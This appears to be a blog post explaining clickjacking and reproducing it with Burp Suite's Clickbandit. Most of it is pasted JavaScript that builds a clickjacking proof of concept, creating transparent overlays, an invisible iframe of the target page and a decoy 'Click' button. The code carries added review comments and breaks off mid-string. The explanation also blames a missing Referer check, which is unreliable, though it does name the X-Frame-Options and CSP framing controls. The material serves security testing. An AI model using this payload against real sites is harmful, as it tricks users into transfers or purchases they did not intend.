Principle and reproduction of clickjacking vulnerability

1. Vulnerability principle

Clickjacking (Burp Suite's tool for it is called Clickbandit) works by abusing the fact that an HTML iframe can be rendered transparently. The attacker covers the original web page with a transparent frame so that the victim clicks on it without realising. The vulnerability is mainly attributed here to the fact that the source of the Referer field is not checked; it also requires that the target page can be loaded inside a frame at all, i.e. that the server sends no X-Frame-Options header or CSP frame-ancestors directive, which is the control defenders should verify. It is often combined with CSRF and XSS.

In the figure, the attacker overlays a transparent frame on the original website. When the victim visits website A as usual, they actually click on the transparent frame B. Attackers use this vulnerability to lure victims into clicking key positions that trigger dangerous operations, such as transfers or purchases.

2. Vulnerability reproduction

1. In Burp Suite, select Clickbandit and copy the payload.

Below is the payload:

/* Copyright PortSwigger Ltd. All rights reserved. Usage is subject to the Burp Suite license terms. See https://portswigger.net for more details. */
!function(){
	// Shared state for the Clickbandit helpers that follow (one declaration per name).
	var initialZoomFactor = '1.0'; // not read in the visible part of the file — TODO confirm where it is used
	var win; // not referenced in the visible part of the file
	var doc; // document the helpers build into (doc.createElement / doc.body in addClickTrap); presumably assigned later
	var width; // read by generatePoc as the default maximum width of the PoC frame
	var height; // read by generatePoc as the default maximum height of the PoC frame
	var clicks = []; // not referenced in the visible part of the file
	function addClickTrap(element, minusY) {
		// Cover `element` with a half-transparent, clickable <div> so that a click on
		// it is captured (and turned into PoC coordinates via generatePoc) instead of
		// reaching the underlying page.
		//   element - DOM element to cover; its offsetWidth/offsetHeight size the overlay
		//   minusY  - optional vertical offset subtracted from the recorded pageY
		var overlay = doc.createElement('div');
		var position = findPos(element);
		Object.assign(overlay.style, {
			backgroundColor: 'none', // not a valid colour value; browsers ignore it
			border: 'none',
			position: 'absolute',
			left: position[0] + 'px',
			top: position[1] + 'px',
			width: element.offsetWidth + 'px',
			height: element.offsetHeight + 'px'
		});
		// NOTE(review): zIndex is read from the element itself, not element.style, so
		// on a real DOM node this is normally undefined and the branch is skipped.
		if (element.zIndex || element.zIndex === '0') {
			overlay.style.zIndex = +element.zIndex + 1;
		}
		overlay.style.opacity = '0.5';
		overlay.style.cursor = 'pointer';
		overlay.clickTrap = 1; // marker property; presumably read elsewhere to recognise trap elements
		overlay.addEventListener('click', function (event) {
			// `event.page` is not a MouseEvent property, so without minusY the y
			// coordinate is undefined here — presumably a typo for pageY.
			var yCoord = minusY ? event.pageY - minusY : event.page;
			generatePoc({ x: event.pageX, y: yCoord });
			event.preventDefault();
			event.stopPropagation();
			return false;
		}, true);
		doc.body.appendChild(overlay);
	}
	function addMessage(msg) {
		// Show `msg` in a fixed banner along the bottom of the page for four seconds,
		// then remove it. Uses the global `document`, not the module-level `doc`.
		var banner = document.createElement('div');
		Object.assign(banner.style, {
			width: '100%',
			height: '20px',
			backgroundColor: '#fff5bf',
			border: '1px solid #ff9900',
			padding: '5px',
			position: 'fixed',
			bottom: '0',
			left: '0',
			zIndex: 100000,
			textAlign: 'center',
			fontFamily: 'Arial',
			color: '#000'
		});
		banner.appendChild(document.createTextNode(msg));
		document.body.appendChild(banner);
		// Auto-dismiss after 4 s.
		setTimeout(function () {
			document.body.removeChild(banner);
		}, 4000);
	}
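	function htmlEscape(str) {
		// Allow-list encoder used when the generated PoC embeds a value (e.g. the
		// page URL) inside an HTML attribute: every character other than
		// [A-Za-z0-9_], space, ':', '-', '/', '.', '?' and '=' is replaced by its
		// decimal numeric character reference (&#NN;). Non-string input is coerced
		// to a string first, so null becomes "null".
		// The `u` flag makes the regex iterate by code point, so a character outside
		// the BMP becomes one valid reference (e.g. &#128512;) instead of two
		// surrogate references that are not valid HTML. The former `i` flag is
		// dropped: it was redundant, and under `u` it would also let \w match
		// U+017F and U+212A via case folding. Output for BMP input is unchanged.
		var text = str + '';
		return text.replace(/[^\w :\-\/.?=]/gu, function (ch) {
			return '&#' + ch.codePointAt(0) + ';';
		});
	}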
	function getDocHeight(D) {
		// Largest of the six height measurements exposed by D.body and
		// D.documentElement, for a Document-like object D.
		var body = D.body;
		var root = D.documentElement;
		var heights = [
			body.scrollHeight, root.scrollHeight,
			body.offsetHeight, root.offsetHeight,
			body.clientHeight, root.clientHeight
		];
		return Math.max.apply(null, heights);
	}
	function getDocWidth(D) {
		// Largest of the six width measurements exposed by D.body and
		// D.documentElement, for a Document-like object D.
		var body = D.body;
		var root = D.documentElement;
		var widths = [
			body.scrollWidth, root.scrollWidth,
			body.offsetWidth, root.offsetWidth,
			body.clientWidth, root.clientWidth
		];
		return Math.max.apply(null, widths);
	}
	function findPos(obj) {
		// Page-relative [left, top] of an element, obtained by summing
		// offsetLeft/offsetTop up the offsetParent chain (the topmost ancestor's
		// offsets are included). If obj has no offsetParent but has truthy x and y,
		// those are used instead; otherwise [0, 0] is returned.
		var left = 0;
		var top = 0;
		var node = obj;
		if (node.offsetParent) {
			do {
				left += node.offsetLeft;
				top += node.offsetTop;
				node = node.offsetParent;
			} while (node);
		} else if (node.x && node.y) {
			// Truthiness check: a zero coordinate falls through to [0, 0].
			left += node.x;
			top += node.y;
		}
		return [left, top];
	}
	function generatePoc(config) {
		var html = '', child = '', elementWidth = 1, elementHeight = 1, maxWidth = width, maxHeight = height, cords, zoomIncrement = 1, desiredX = 200, desiredY = 200, parentOffsetWidth, parentOffsetHeight,
			element = config.element, x = config.x, y = config.y, pixelMode = false;
		if(config.clickTracking) {
			elementWidth = config.clickTracking[0].width;
			elementHeight = config.clickTracking[0].height;
			x = config.clickTracking[0].left;
			y = config.clickTracking[0].top;
			zoomIncrement = 1;
			config.currentPosition = 0;
		} else {
			config.clickTracking = [];
			if(element) {
				elementWidth = element.offsetWidth;
				elementHeight = element.offsetHeight;
				cords = findPos(element);
				x = cords[0];
				y = cords[1];
				zoomIncrement = 1;
			} else {
				zoomIncrement = 5;
				pixelMode = true;
			}
		}
		parentOffsetWidth = desiredX - x;
		parentOffsetHeight = desiredY - y;
		child = btoa('<script>window.addEventListener("message", function(e){ var data, childFrame = document.getElementById("childFrame"); try { data = JSON.parse(e.data); } catch(e){ data = {}; } if(!data.clickbandit){ return false; } childFrame.style.width = data.docWidth+"px";childFrame.style.height = data.docHeight+"px";childFrame.style.left = data.left+"px";childFrame.style.top = data.top+"px";}, false);<\/script><iframe src="'+htmlEscape(self.location)+'" scrolling="no" style="width:'+(+maxWidth)+'px;height:'+(+maxHeight)+'px;position:absolute;left:'+parentOffsetWidth+'px;top:'+parentOffsetHeight+'px;border:0;" frameborder="0" '+(window.clickbandit.sandbox?'sandbox="allow-same-origin	'+htmlEscape(document.getElementById('sandboxIframeInput').value)+'" ':'')+'id="childFrame" onload="parent.postMessage(JSON.stringify({clickbandit:1}),\'*\')"><\/iframe>');
		html += '<body>\n';
		html += '<div id="container" style="clip-path:none;clip:auto;overflow:visible;position:absolute;left:0;top:0;width:100%;height:100%">\n';
		html += '<!-- Clickjacking PoC Generated by Burp Suite Professional -->\n';
		html += '<input id="clickjack_focus" style="opacity:0;position:absolute;left:-5000px;">\n';
		html += '<div id="clickjack_button" style="opacity:0;-webkit-transform-style: preserve-3d;-moz-transform-style: preserve-3d;transform-style: preserve-3d;text-align:center;font-family:Arial;font-size:100%;width:'+elementWidth+'px;height:'+elementHeight+'px;z-index:0;background-color:red;color:#fff;position:absolute;left:'+(+desiredX)+'px;top:'+(+desiredY)+'px"><div style="position:relative;top: 50%;transform: translateY(-50%);">Click<\/div><\/div>\n';
		html += '<!-- Show this element when clickjacking is complete -->\n';
		html += '<div id="clickjack_complete" style="display:none;-webkit-transform-style: preserve-3d;-moz-transform-style: preserve-3d;transform-style: preserve-3d;font-family:Arial;font-size:16pt;color:red;text-align:center;width:100%;height:100%;"><div style="position:relative;top: 50%;transform: translateY(-50%);">You\'ve been c


Origin blog.csdn.net/weixin_54438700/article/details/124878119